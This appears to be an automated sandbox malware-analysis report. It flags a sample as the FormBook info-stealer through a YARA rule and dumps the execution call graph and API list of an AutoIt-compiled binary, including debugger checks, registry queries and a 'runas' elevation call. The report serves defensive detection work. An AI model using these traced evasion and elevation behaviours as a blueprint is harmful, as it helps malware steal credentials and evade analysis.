                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:12:39:12
                                                  Start date:17/12/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff728280000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:3.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:50
104528->104409 104529->104528 104530 ec4c50 GetProcAddress 104529->104530 104530->104528 104532 ee0db6 Mailbox 59 API calls 104531->104532 104533 ec5240 104532->104533 104533->104416 104535 ec4ea3 FindResourceExW 104534->104535 104539 ec4ec0 104534->104539 104536 efd933 LoadResource 104535->104536 104535->104539 104537 efd948 SizeofResource 104536->104537 104536->104539 104538 efd95c LockResource 104537->104538 104537->104539 104538->104539 104539->104422 104541 efd9ab 104540->104541 104542 ec4ef4 104540->104542 104546 ee584d 104542->104546 104544 ec4f02 104544->104428 104545->104422 104549 ee5859 __setmbcp 104546->104549 104547 ee586b 104559 ee8b28 58 API calls __getptd_noexit 104547->104559 104549->104547 104550 ee5891 104549->104550 104561 ee6c11 104550->104561 104551 ee5870 104560 ee8db6 9 API calls __strnicoll_l 104551->104560 104556 ee58a6 104568 ee58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 104556->104568 104558 ee587b __setmbcp 104558->104544 104559->104551 104560->104558 104562 ee6c43 EnterCriticalSection 104561->104562 104563 ee6c21 104561->104563 104565 ee5897 104562->104565 104563->104562 104564 ee6c29 104563->104564 104566 ee9c0b __lock 58 API calls 104564->104566 104567 ee57be 83 API calls 5 library calls 104565->104567 104566->104565 104567->104556 104568->104558 104572 ee55fd 104569->104572 104571 ec4f2e 104571->104436 104573 ee5609 __setmbcp 104572->104573 104574 ee564c 104573->104574 104575 ee5644 __setmbcp 104573->104575 104580 ee561f _memset 104573->104580 104576 ee6c11 __lock_file 59 API calls 104574->104576 104575->104571 104577 ee5652 104576->104577 104585 ee541d 104577->104585 104599 ee8b28 58 API calls __getptd_noexit 104580->104599 104581 ee5639 104600 ee8db6 9 API calls __strnicoll_l 104581->104600 104589 ee5438 _memset 104585->104589 104591 ee5453 104585->104591 104586 ee5443 104697 ee8b28 58 API calls __getptd_noexit 104586->104697 104588 ee5448 104698 ee8db6 9 API calls __strnicoll_l 104588->104698 104589->104586 
104589->104591 104596 ee5493 104589->104596 104601 ee5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 104591->104601 104593 ee55a4 _memset 104700 ee8b28 58 API calls __getptd_noexit 104593->104700 104596->104591 104596->104593 104602 ee46e6 104596->104602 104609 ef0e5b 104596->104609 104677 ef0ba7 104596->104677 104699 ef0cc8 58 API calls 4 library calls 104596->104699 104599->104581 104600->104575 104601->104575 104603 ee4705 104602->104603 104604 ee46f0 104602->104604 104603->104596 104605 ee8b28 __setmbcp 58 API calls 104604->104605 104606 ee46f5 104605->104606 104607 ee8db6 __strnicoll_l 9 API calls 104606->104607 104608 ee4700 104607->104608 104608->104596 104610 ef0e7c 104609->104610 104611 ef0e93 104609->104611 104612 ee8af4 __lseeki64 58 API calls 104610->104612 104613 ef15cb 104611->104613 104618 ef0ecd 104611->104618 104614 ef0e81 104612->104614 104615 ee8af4 __lseeki64 58 API calls 104613->104615 104617 ee8b28 __setmbcp 58 API calls 104614->104617 104616 ef15d0 104615->104616 104619 ee8b28 __setmbcp 58 API calls 104616->104619 104657 ef0e88 104617->104657 104620 ef0ed5 104618->104620 104625 ef0eec 104618->104625 104621 ef0ee1 104619->104621 104622 ee8af4 __lseeki64 58 API calls 104620->104622 104624 ee8db6 __strnicoll_l 9 API calls 104621->104624 104623 ef0eda 104622->104623 104627 ee8b28 __setmbcp 58 API calls 104623->104627 104624->104657 104626 ef0f01 104625->104626 104629 ef0f1b 104625->104629 104630 ef0f39 104625->104630 104625->104657 104628 ee8af4 __lseeki64 58 API calls 104626->104628 104627->104621 104628->104623 104629->104626 104634 ef0f26 104629->104634 104631 ee881d __malloc_crt 58 API calls 104630->104631 104632 ef0f49 104631->104632 104635 ef0f6c 104632->104635 104636 ef0f51 104632->104636 104633 ef5c6b __write_nolock 58 API calls 104637 ef103a 104633->104637 104634->104633 104640 ef18c1 __lseeki64_nolock 60 API calls 104635->104640 104638 ee8b28 __setmbcp 58 API calls 104636->104638 104639 ef10b3 ReadFile 104637->104639 104644 
ef1050 GetConsoleMode 104637->104644 104641 ef0f56 104638->104641 104642 ef10d5 104639->104642 104643 ef1593 GetLastError 104639->104643 104640->104634 104645 ee8af4 __lseeki64 58 API calls 104641->104645 104642->104643 104650 ef10a5 104642->104650 104646 ef1093 104643->104646 104647 ef15a0 104643->104647 104648 ef1064 104644->104648 104649 ef10b0 104644->104649 104645->104657 104655 ee8b07 __dosmaperr 58 API calls 104646->104655 104659 ef1099 104646->104659 104651 ee8b28 __setmbcp 58 API calls 104647->104651 104648->104649 104652 ef106a ReadConsoleW 104648->104652 104649->104639 104650->104659 104661 ef110a 104650->104661 104667 ef1377 104650->104667 104653 ef15a5 104651->104653 104652->104650 104654 ef108d GetLastError 104652->104654 104656 ee8af4 __lseeki64 58 API calls 104653->104656 104654->104646 104655->104659 104656->104659 104657->104596 104658 ee2d55 _free 58 API calls 104658->104657 104659->104657 104659->104658 104662 ef1176 ReadFile 104661->104662 104668 ef11f7 104661->104668 104663 ef1197 GetLastError 104662->104663 104669 ef11a1 104662->104669 104663->104669 104664 ef12b4 104673 ef18c1 __lseeki64_nolock 60 API calls 104664->104673 104674 ef1264 MultiByteToWideChar 104664->104674 104665 ef12a4 104670 ee8b28 __setmbcp 58 API calls 104665->104670 104666 ef147d ReadFile 104671 ef14a0 GetLastError 104666->104671 104672 ef14ae 104666->104672 104667->104659 104667->104666 104668->104659 104668->104664 104668->104665 104668->104674 104669->104661 104675 ef18c1 __lseeki64_nolock 60 API calls 104669->104675 104670->104659 104671->104672 104672->104667 104676 ef18c1 __lseeki64_nolock 60 API calls 104672->104676 104673->104674 104674->104654 104674->104659 104675->104669 104676->104672 104678 ef0bb2 104677->104678 104681 ef0bc7 104677->104681 104679 ee8b28 __setmbcp 58 API calls 104678->104679 104680 ef0bb7 104679->104680 104682 ee8db6 __strnicoll_l 9 API calls 104680->104682 104683 ef0bfc 104681->104683 104684 ef5fe4 __getbuf 58 API calls 104681->104684 104690 
ef0bc2 104681->104690 104682->104690 104685 ee46e6 _fprintf 58 API calls 104683->104685 104684->104683 104686 ef0c10 104685->104686 104687 ef0d47 __read 72 API calls 104686->104687 104688 ef0c17 104687->104688 104689 ee46e6 _fprintf 58 API calls 104688->104689 104688->104690 104691 ef0c3a 104689->104691 104690->104596 104691->104690 104692 ee46e6 _fprintf 58 API calls 104691->104692 104693 ef0c46 104692->104693 104693->104690 104694 ee46e6 _fprintf 58 API calls 104693->104694 104695 ef0c53 104694->104695 104696 ee46e6 _fprintf 58 API calls 104695->104696 104696->104690 104697->104588 104698->104591 104699->104596 104700->104588 104702 ee5c6c __setmbcp 104701->104702 104703 ee5c7e 104702->104703 104704 ee5c93 104702->104704 104715 ee8b28 58 API calls __getptd_noexit 104703->104715 104705 ee6c11 __lock_file 59 API calls 104704->104705 104707 ee5c99 104705->104707 104717 ee58d0 67 API calls 7 library calls 104707->104717 104708 ee5c83 104716 ee8db6 9 API calls __strnicoll_l 104708->104716 104711 ee5ca4 104718 ee5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104711->104718 104713 ee5cb6 104714 ee5c8e __setmbcp 104713->104714 104714->104441 104715->104708 104716->104714 104717->104711 104718->104713 104720 ec785a 104719->104720 104721 ec78b7 104719->104721 104720->104721 104723 ec7865 104720->104723 104722 ec7d2c 59 API calls 104721->104722 104724 ec7888 _memmove 104722->104724 104725 efeb09 104723->104725 104726 ec7880 104723->104726 104724->104231 104727 ec8029 59 API calls 104725->104727 104741 ec7f27 59 API calls Mailbox 104726->104741 104729 efeb13 104727->104729 104730 ee0db6 Mailbox 59 API calls 104729->104730 104731 efeb33 104730->104731 104733 ec7d3a 104732->104733 104735 ec7d43 _memmove 104732->104735 104734 ec7e4f 59 API calls 104733->104734 104733->104735 104734->104735 104735->104224 104737 ec7da6 104736->104737 104739 ec7d99 104736->104739 104738 ee0db6 Mailbox 59 API calls 104737->104738 104738->104739 104739->104226 104740->104253 
104741->104724 105105 ec7c5f __wsetenvp 105104->105105 105106 ec8029 59 API calls 105105->105106 105107 ec7c70 _memmove 105105->105107 105108 efed07 _memmove 105106->105108 105107->104376 105109->104388 105111 ec9837 84 API calls 105110->105111 105112 f3cb1a 105111->105112 105113 f3cb61 Mailbox 105112->105113 105146 f3d7a5 105112->105146 105113->104134 105115 f3cf2e 105191 f3d8c8 92 API calls Mailbox 105115->105191 105118 f3cf3d 105119 f3cdc7 105118->105119 105121 f3cf49 105118->105121 105159 f3c96e 105119->105159 105120 ec9837 84 API calls 105136 f3cbb2 Mailbox 105120->105136 105121->105113 105126 f3ce00 105127 f3ce33 105126->105127 105128 f3ce1a 105126->105128 105177 ec92ce 105127->105177 105176 f29e4a 89 API calls 4 library calls 105128->105176 105132 f3ce25 GetCurrentProcess TerminateProcess 105132->105127 105133 f3cdb9 105133->105115 105133->105119 105136->105113 105136->105120 105136->105133 105174 f3fbce 59 API calls 2 library calls 105136->105174 105175 f3cfdf 61 API calls 2 library calls 105136->105175 105138 f3cfa4 105138->105113 105142 f3cfb8 FreeLibrary 105138->105142 105139 f3ce6b 105189 f3d649 107 API calls _free 105139->105189 105142->105113 105144 f3ce7c 105144->105138 105145 ec9d3c 60 API calls 105144->105145 105190 ec8d40 59 API calls Mailbox 105144->105190 105192 f3d649 107 API calls _free 105144->105192 105145->105144 105147 ec7e4f 59 API calls 105146->105147 105148 f3d7c0 CharLowerBuffW 105147->105148 105193 f1f167 105148->105193 105152 ec7667 59 API calls 105153 f3d7f9 105152->105153 105154 ec784b 59 API calls 105153->105154 105155 f3d810 105154->105155 105156 ec7d2c 59 API calls 105155->105156 105157 f3d81c Mailbox 105156->105157 105158 f3d858 Mailbox 105157->105158 105200 f3cfdf 61 API calls 2 library calls 105157->105200 105158->105136 105160 f3c9de 105159->105160 105161 f3c989 105159->105161 105165 f3da50 105160->105165 105162 ee0db6 Mailbox 59 API calls 105161->105162 105164 f3c9ab 105162->105164 105163 ee0db6 Mailbox 59 API calls 
105163->105164 105164->105160 105164->105163 105166 f3dc79 Mailbox 105165->105166 105173 f3da73 _strcat _wcscpy __wsetenvp 105165->105173 105166->105126 105167 ec9be6 59 API calls 105167->105173 105168 ec9b3c 59 API calls 105168->105173 105169 ec9b98 59 API calls 105169->105173 105170 ec9837 84 API calls 105170->105173 105171 ee571c 58 API calls _W_store_winword 105171->105173 105173->105166 105173->105167 105173->105168 105173->105169 105173->105170 105173->105171 105203 f25887 61 API calls 2 library calls 105173->105203 105174->105136 105175->105136 105176->105132 105178 ec92d6 105177->105178 105179 ee0db6 Mailbox 59 API calls 105178->105179 105180 ec92e4 105179->105180 105182 ec92f0 105180->105182 105204 ec91fc 59 API calls Mailbox 105180->105204 105183 ec9050 105182->105183 105205 ec9160 105183->105205 105185 ec905f 105186 ee0db6 Mailbox 59 API calls 105185->105186 105187 ec90fb 105185->105187 105186->105187 105187->105144 105188 ec8d40 59 API calls Mailbox 105187->105188 105188->105139 105189->105144 105190->105144 105191->105118 105192->105144 105195 f1f192 __wsetenvp 105193->105195 105194 f1f1d1 105194->105152 105194->105157 105195->105194 105196 f1f278 105195->105196 105197 f1f1c7 105195->105197 105196->105194 105202 ec78c4 61 API calls 105196->105202 105197->105194 105201 ec78c4 61 API calls 105197->105201 105200->105158 105201->105197 105202->105196 105203->105173 105204->105182 105206 ec9169 Mailbox 105205->105206 105207 eff19f 105206->105207 105212 ec9173 105206->105212 105208 ee0db6 Mailbox 59 API calls 105207->105208 105210 eff1ab 105208->105210 105209 ec917a 105209->105185 105211 ec9c90 Mailbox 59 API calls 105211->105212 105212->105209 105212->105211 105214 f24475 FindFirstFileW 105213->105214 105215 f23c3e 105213->105215 105214->105215 105216 f2448a FindClose 105214->105216 105215->103981 105216->105215 105217->104171 105218->104143 105219->104158 105220->104154 105221->104159 105222->104169 105223->104172 105224->104176 105225->104001 
105226->103998 105227->103885 105228->103899 105229 ec1066 105234 ecf76f 105229->105234 105231 ec106c 105232 ee2d40 __cinit 67 API calls 105231->105232 105233 ec1076 105232->105233 105235 ecf790 105234->105235 105267 edff03 105235->105267 105239 ecf7d7 105240 ec7667 59 API calls 105239->105240 105241 ecf7e1 105240->105241 105242 ec7667 59 API calls 105241->105242 105243 ecf7eb 105242->105243 105244 ec7667 59 API calls 105243->105244 105245 ecf7f5 105244->105245 105246 ec7667 59 API calls 105245->105246 105247 ecf833 105246->105247 105248 ec7667 59 API calls 105247->105248 105249 ecf8fe 105248->105249 105277 ed5f87 105249->105277 105253 ecf930 105254 ec7667 59 API calls 105253->105254 105255 ecf93a 105254->105255 105305 edfd9e 105255->105305 105257 ecf981 105258 ecf991 GetStdHandle 105257->105258 105259 ecf9dd 105258->105259 105260 f045ab 105258->105260 105261 ecf9e5 OleInitialize 105259->105261 105260->105259 105262 f045b4 105260->105262 105261->105231 105312 f26b38 64 API calls Mailbox 105262->105312 105264 f045bb 105313 f27207 CreateThread 105264->105313 105266 f045c7 CloseHandle 105266->105261 105314 edffdc 105267->105314 105270 edffdc 59 API calls 105271 edff45 105270->105271 105272 ec7667 59 API calls 105271->105272 105273 edff51 105272->105273 105274 ec7bcc 59 API calls 105273->105274 105275 ecf796 105274->105275 105276 ee0162 6 API calls 105275->105276 105276->105239 105278 ec7667 59 API calls 105277->105278 105279 ed5f97 105278->105279 105280 ec7667 59 API calls 105279->105280 105281 ed5f9f 105280->105281 105321 ed5a9d 105281->105321 105284 ed5a9d 59 API calls 105285 ed5faf 105284->105285 105286 ec7667 59 API calls 105285->105286 105287 ed5fba 105286->105287 105288 ee0db6 Mailbox 59 API calls 105287->105288 105289 ecf908 105288->105289 105290 ed60f9 105289->105290 105291 ed6107 105290->105291 105292 ec7667 59 API calls 105291->105292 105293 ed6112 105292->105293 105294 ec7667 59 API calls 105293->105294 105295 ed611d 105294->105295 105296 ec7667 59 API 
calls 105295->105296 105297 ed6128 105296->105297 105298 ec7667 59 API calls 105297->105298 105299 ed6133 105298->105299 105300 ed5a9d 59 API calls 105299->105300 105301 ed613e 105300->105301 105302 ee0db6 Mailbox 59 API calls 105301->105302 105303 ed6145 RegisterWindowMessageW 105302->105303 105303->105253 105306 edfdae 105305->105306 105307 f1576f 105305->105307 105309 ee0db6 Mailbox 59 API calls 105306->105309 105324 f29ae7 60 API calls 105307->105324 105311 edfdb6 105309->105311 105310 f1577a 105311->105257 105312->105264 105313->105266 105325 f271ed 65 API calls 105313->105325 105315 ec7667 59 API calls 105314->105315 105316 edffe7 105315->105316 105317 ec7667 59 API calls 105316->105317 105318 edffef 105317->105318 105319 ec7667 59 API calls 105318->105319 105320 edff3b 105319->105320 105320->105270 105322 ec7667 59 API calls 105321->105322 105323 ed5aa5 105322->105323 105323->105284 105324->105310 105326 ec107d 105331 ec708b 105326->105331 105328 ec108c 105329 ee2d40 __cinit 67 API calls 105328->105329 105330 ec1096 105329->105330 105332 ec709b __write_nolock 105331->105332 105333 ec7667 59 API calls 105332->105333 105334 ec7151 105333->105334 105362 ec4706 105334->105362 105336 ec715a 105369 ee050b 105336->105369 105339 ec7cab 59 API calls 105340 ec7173 105339->105340 105375 ec3f74 105340->105375 105343 ec7667 59 API calls 105344 ec718b 105343->105344 105345 ec7d8c 59 API calls 105344->105345 105346 ec7194 RegOpenKeyExW 105345->105346 105347 efe8b1 RegQueryValueExW 105346->105347 105352 ec71b6 Mailbox 105346->105352 105348 efe8ce 105347->105348 105349 efe943 RegCloseKey 105347->105349 105350 ee0db6 Mailbox 59 API calls 105348->105350 105349->105352 105361 efe955 _wcscat Mailbox __wsetenvp 105349->105361 105351 efe8e7 105350->105351 105353 ec522e 59 API calls 105351->105353 105352->105328 105354 efe8f2 RegQueryValueExW 105353->105354 105356 efe90f 105354->105356 105358 efe929 105354->105358 105355 ec79f2 59 API calls 105355->105361 105357 ec7bcc 59 API calls 
105356->105357 105357->105358 105358->105349 105359 ec7de1 59 API calls 105359->105361 105360 ec3f74 59 API calls 105360->105361 105361->105352 105361->105355 105361->105359 105361->105360 105381 ef1940 105362->105381 105365 ec7de1 59 API calls 105366 ec4739 105365->105366 105383 ec4750 105366->105383 105368 ec4743 Mailbox 105368->105336 105370 ef1940 __write_nolock 105369->105370 105371 ee0518 GetFullPathNameW 105370->105371 105372 ee053a 105371->105372 105373 ec7bcc 59 API calls 105372->105373 105374 ec7165 105373->105374 105374->105339 105377 ec3f82 105375->105377 105380 ec3fa4 _memmove 105375->105380 105376 ee0db6 Mailbox 59 API calls 105378 ec3fb8 105376->105378 105379 ee0db6 Mailbox 59 API calls 105377->105379 105378->105343 105379->105380 105380->105376 105382 ec4713 GetModuleFileNameW 105381->105382 105382->105365 105384 ef1940 __write_nolock 105383->105384 105385 ec475d GetFullPathNameW 105384->105385 105386 ec477c 105385->105386 105387 ec4799 105385->105387 105389 ec7bcc 59 API calls 105386->105389 105388 ec7d8c 59 API calls 105387->105388 105390 ec4788 105388->105390 105389->105390 105393 ec7726 105390->105393 105394 ec7734 105393->105394 105395 ec7d2c 59 API calls 105394->105395 105396 ec4794 105395->105396 105396->105368 105397 effdfc 105430 ecab30 Mailbox _memmove 105397->105430 105399 f1617e Mailbox 59 API calls 105425 eca057 105399->105425 105400 ec9c90 Mailbox 59 API calls 105400->105430 105401 ee0db6 59 API calls Mailbox 105401->105430 105404 ecb525 105623 f29e4a 89 API calls 4 library calls 105404->105623 105405 ee0db6 59 API calls Mailbox 105422 ec9f37 Mailbox 105405->105422 105406 f00055 105622 f29e4a 89 API calls 4 library calls 105406->105622 105408 ecb475 105415 ec8047 59 API calls 105408->105415 105411 f00064 105412 ecb47a 105412->105406 105426 f009e5 105412->105426 105415->105425 105416 ec7667 59 API calls 105416->105422 105418 ec8047 59 API calls 105418->105422 105419 ee2d40 67 API calls __cinit 105419->105422 105420 ec7de1 59 API calls 
105420->105430 105421 f16e8f 59 API calls 105421->105422 105422->105405 105422->105406 105422->105408 105422->105412 105422->105416 105422->105418 105422->105419 105422->105421 105423 f009d6 105422->105423 105422->105425 105427 eca55a 105422->105427 105618 ecc8c0 340 API calls 2 library calls 105422->105618 105619 ecb900 60 API calls Mailbox 105422->105619 105626 f29e4a 89 API calls 4 library calls 105423->105626 105627 f29e4a 89 API calls 4 library calls 105426->105627 105625 f29e4a 89 API calls 4 library calls 105427->105625 105428 f3bc6b 340 API calls 105428->105430 105430->105400 105430->105401 105430->105404 105430->105420 105430->105422 105430->105425 105430->105428 105431 ec9ea0 340 API calls 105430->105431 105433 f0086a 105430->105433 105435 f00878 105430->105435 105437 f0085c 105430->105437 105438 ecb21c 105430->105438 105441 f16e8f 59 API calls 105430->105441 105443 ecb2b6 105430->105443 105449 f2d07b 105430->105449 105496 f3df23 105430->105496 105499 ed1fc3 105430->105499 105539 f3445a 105430->105539 105548 f422da 105430->105548 105577 f3c2e0 105430->105577 105609 f27956 105430->105609 105615 f1617e 105430->105615 105621 f3c193 85 API calls 2 library calls 105430->105621 105431->105430 105434 ec9c90 Mailbox 59 API calls 105433->105434 105434->105437 105624 f29e4a 89 API calls 4 library calls 105435->105624 105437->105399 105437->105425 105439 ec9d3c 60 API calls 105438->105439 105440 ecb22d 105439->105440 105442 ec9d3c 60 API calls 105440->105442 105441->105430 105442->105443 105620 ecf6a3 340 API calls 105443->105620 105450 f2d09a 105449->105450 105451 f2d0a5 105449->105451 105641 ec9b3c 59 API calls 105450->105641 105455 ec7667 59 API calls 105451->105455 105493 f2d17f Mailbox 105451->105493 105453 ee0db6 Mailbox 59 API calls 105454 f2d1c8 105453->105454 105456 f2d1d4 105454->105456 105644 ec57a6 60 API calls Mailbox 105454->105644 105457 f2d0c9 105455->105457 105460 ec9837 84 API calls 105456->105460 105459 ec7667 59 API calls 105457->105459 105461 
f2d0d2 105459->105461 105462 f2d1ec 105460->105462 105463 ec9837 84 API calls 105461->105463 105628 ec57f6 105462->105628 105465 f2d0de 105463->105465 105467 ec459b 59 API calls 105465->105467 105470 f2d0f3 105467->105470 105468 f2d233 105474 f2d295 105468->105474 105475 f2d25e 105468->105475 105469 f2d1ff GetLastError 105471 f2d218 105469->105471 105472 ec7b2e 59 API calls 105470->105472 105491 f2d188 Mailbox 105471->105491 105645 ec58ba CloseHandle 105471->105645 105473 f2d126 105472->105473 105476 f2d178 105473->105476 105481 f23c37 3 API calls 105473->105481 105477 ee0db6 Mailbox 59 API calls 105474->105477 105478 ee0db6 Mailbox 59 API calls 105475->105478 105643 ec9b3c 59 API calls 105476->105643 105482 f2d29a 105477->105482 105483 f2d263 105478->105483 105484 f2d136 105481->105484 105487 ec7667 59 API calls 105482->105487 105482->105491 105485 f2d274 105483->105485 105488 ec7667 59 API calls 105483->105488 105484->105476 105486 f2d13a 105484->105486 105646 f3fbce 59 API calls 2 library calls 105485->105646 105490 ec7de1 59 API calls 105486->105490 105487->105491 105488->105485 105492 f2d147 105490->105492 105491->105430 105642 f23a2a 63 API calls Mailbox 105492->105642 105493->105453 105493->105491 105495 f2d150 Mailbox 105495->105476 105497 f3cadd 129 API calls 105496->105497 105498 f3df33 105497->105498 105498->105430 105693 ec9a98 105499->105693 105503 ee0db6 Mailbox 59 API calls 105504 ed1ff4 105503->105504 105505 ed2004 105504->105505 105721 ec57a6 60 API calls Mailbox 105504->105721 105509 ec9837 84 API calls 105505->105509 105506 f06585 105507 ed2029 105506->105507 105725 f2f574 59 API calls 105506->105725 105515 ed2036 105507->105515 105726 ec9b3c 59 API calls 105507->105726 105511 ed2012 105509->105511 105513 ec57f6 67 API calls 105511->105513 105512 f065cd 105514 f065d5 105512->105514 105512->105515 105516 ed2021 105513->105516 105727 ec9b3c 59 API calls 105514->105727 105518 ec5cdf 2 API calls 105515->105518 105516->105506 105516->105507 105724 
ec58ba CloseHandle 105516->105724 105520 ed203d 105518->105520 105521 f065e7 105520->105521 105522 ed2057 105520->105522 105524 ee0db6 Mailbox 59 API calls 105521->105524 105523 ec7667 59 API calls 105522->105523 105525 ed205f 105523->105525 105526 f065ed 105524->105526 105706 ec5572 105525->105706 105531 f06601 105526->105531 105728 ec5850 ReadFile SetFilePointerEx 105526->105728 105530 ed206e 105533 f06605 _memmove 105530->105533 105722 ec9a3c 59 API calls Mailbox 105530->105722 105531->105533 105729 f276c4 59 API calls 2 library calls 105531->105729 105534 ed2082 Mailbox 105535 ed20bc 105534->105535 105536 ec5c6f CloseHandle 105534->105536 105535->105430 105537 ed20b0 105536->105537 105537->105535 105723 ec58ba CloseHandle 105537->105723 105540 ec9837 84 API calls 105539->105540 105541 f34494 105540->105541 105733 ec6240 105541->105733 105543 f344a4 105544 f344c9 105543->105544 105545 ec9ea0 340 API calls 105543->105545 105546 ec9a98 59 API calls 105544->105546 105547 f344cd 105544->105547 105545->105544 105546->105547 105547->105430 105549 ec9837 84 API calls 105548->105549 105550 f422f4 105549->105550 105551 ec7a16 59 API calls 105550->105551 105552 f42303 105551->105552 105553 f42331 105552->105553 105784 ec9b3c 59 API calls 105552->105784 105554 ed5a9d 59 API calls 105553->105554 105557 f4233a 105554->105557 105556 f42314 105556->105553 105558 f42319 105556->105558 105559 ec7de1 59 API calls 105557->105559 105560 ec8047 59 API calls 105558->105560 105561 f42348 105559->105561 105562 f42323 Mailbox 105560->105562 105766 ed5b12 105561->105766 105789 ec9a3c 59 API calls Mailbox 105562->105789 105564 f42357 Mailbox 105775 ed5bc4 105564->105775 105568 f4240b Mailbox 105568->105430 105569 ec7667 59 API calls 105572 f42389 105569->105572 105570 f423c0 105574 ec7b2e 59 API calls 105570->105574 105575 f423da Mailbox 105570->105575 105572->105570 105573 ec3f74 59 API calls 105572->105573 105778 f161bb 105572->105778 105573->105572 105574->105570 105785 ed5ace 
105575->105785 105578 ec7667 59 API calls 105577->105578 105579 f3c2f4 105578->105579 105580 ec7667 59 API calls 105579->105580 105581 f3c2fc 105580->105581 105582 ec7667 59 API calls 105581->105582 105583 f3c304 105582->105583 105584 ec9837 84 API calls 105583->105584 105608 f3c312 105584->105608 105585 ec7924 59 API calls 105585->105608 105586 ec7bcc 59 API calls 105586->105608 105587 f3c4fb 105590 f3c528 Mailbox 105587->105590 105806 ec9a3c 59 API calls Mailbox 105587->105806 105589 f3c4e2 105592 ec7cab 59 API calls 105589->105592 105590->105430 105591 ec8047 59 API calls 105591->105608 105594 f3c4ef 105592->105594 105593 f3c4fd 105595 ec7cab 59 API calls 105593->105595 105597 ec7b2e 59 API calls 105594->105597 105598 f3c50c 105595->105598 105596 ec7e4f 59 API calls 105600 f3c3a9 CharUpperBuffW 105596->105600 105597->105587 105601 ec7b2e 59 API calls 105598->105601 105599 ec7e4f 59 API calls 105602 f3c469 CharUpperBuffW 105599->105602 105805 ec843a 68 API calls 105600->105805 105601->105587 105604 ecc5a7 69 API calls 105602->105604 105604->105608 105605 ec9837 84 API calls 105605->105608 105606 ec7cab 59 API calls 105606->105608 105607 ec7b2e 59 API calls 105607->105608 105608->105585 105608->105586 105608->105587 105608->105589 105608->105590 105608->105591 105608->105593 105608->105596 105608->105599 105608->105605 105608->105606 105608->105607 105610 f27962 105609->105610 105611 ee0db6 Mailbox 59 API calls 105610->105611 105612 f27970 105611->105612 105613 f2797e 105612->105613 105614 ec7667 59 API calls 105612->105614 105613->105430 105614->105613 105807 f160c0 105615->105807 105617 f1618c 105617->105430 105618->105422 105619->105422 105620->105404 105621->105430 105622->105411 105623->105437 105624->105437 105625->105425 105626->105426 105627->105425 105647 ec5c6f 105628->105647 105632 ec5844 105632->105468 105632->105469 105633 ec5821 105633->105632 105659 ec5610 105633->105659 105635 ec5833 105676 ec527b SetFilePointerEx SetFilePointerEx 105635->105676 
105637 ec583a 105637->105632 105639 efdc07 105637->105639 105677 f2345a SetFilePointerEx SetFilePointerEx WriteFile 105639->105677 105640 efdc37 105640->105632 105641->105451 105642->105495 105643->105493 105644->105456 105645->105491 105646->105491 105648 ec5c88 105647->105648 105649 ec5802 105647->105649 105648->105649 105650 ec5c8d CloseHandle 105648->105650 105651 ec5c99 105649->105651 105650->105649 105652 efdd58 105651->105652 105653 ec5cb2 CreateFileW 105651->105653 105654 efdd5e CreateFileW 105652->105654 105656 ec5cd4 105652->105656 105653->105656 105655 efdd84 105654->105655 105654->105656 105678 ec5aee 105655->105678 105656->105633 105660 ec562b 105659->105660 105661 efdba5 105659->105661 105662 ec5aee 2 API calls 105660->105662 105675 ec56ba 105660->105675 105661->105675 105688 ec5cdf 105661->105688 105663 ec564d 105662->105663 105664 ec522e 59 API calls 105663->105664 105666 ec5657 105664->105666 105666->105661 105667 ec5664 105666->105667 105668 ee0db6 Mailbox 59 API calls 105667->105668 105669 ec566f 105668->105669 105670 ec522e 59 API calls 105669->105670 105671 ec567a 105670->105671 105672 ec5bc0 2 API calls 105671->105672 105673 ec56a7 105672->105673 105674 ec5aee 2 API calls 105673->105674 105674->105675 105675->105635 105676->105637 105677->105640 105684 ec5b08 105678->105684 105679 ec5b8f SetFilePointerEx 105686 ec5c4e SetFilePointerEx 105679->105686 105680 efdd28 105687 ec5c4e SetFilePointerEx 105680->105687 105683 efdd42 105684->105679 105684->105680 105685 ec5b63 105684->105685 105685->105656 105686->105685 105687->105683 105689 ec5aee 2 API calls 105688->105689 105690 ec5d00 105689->105690 105691 ec5aee 2 API calls 105690->105691 105692 ec5d14 105691->105692 105692->105675 105694 ec9aa8 105693->105694 105695 eff7d6 105693->105695 105699 ee0db6 Mailbox 59 API calls 105694->105699 105696 eff7e7 105695->105696 105697 ec7bcc 59 API calls 105695->105697 105698 ec7d8c 59 API calls 105696->105698 105697->105696 105703 eff7f1 105698->105703 105700 
                                                    (graph edge data not reproduced: the rendered call graph is not recoverable from the page text; its node list consisted of function addresses in the ec0000 image with the Win32 API names reached from each block)

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC3B68
                                                    • IsDebuggerPresent.KERNEL32 ref: 00EC3B7A
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F852F8,00F852E0,?,?), ref: 00EC3BEB
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                      • Part of subcall function 00ED092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EC3C14,00F852F8,?,?,?), ref: 00ED096E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC3C6F
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F77770,00000010), ref: 00EFD281
                                                    • SetCurrentDirectoryW.KERNEL32(?,00F852F8,?,?,?), ref: 00EFD2B9
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F74260,00F852F8,?,?,?), ref: 00EFD33F
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EFD346
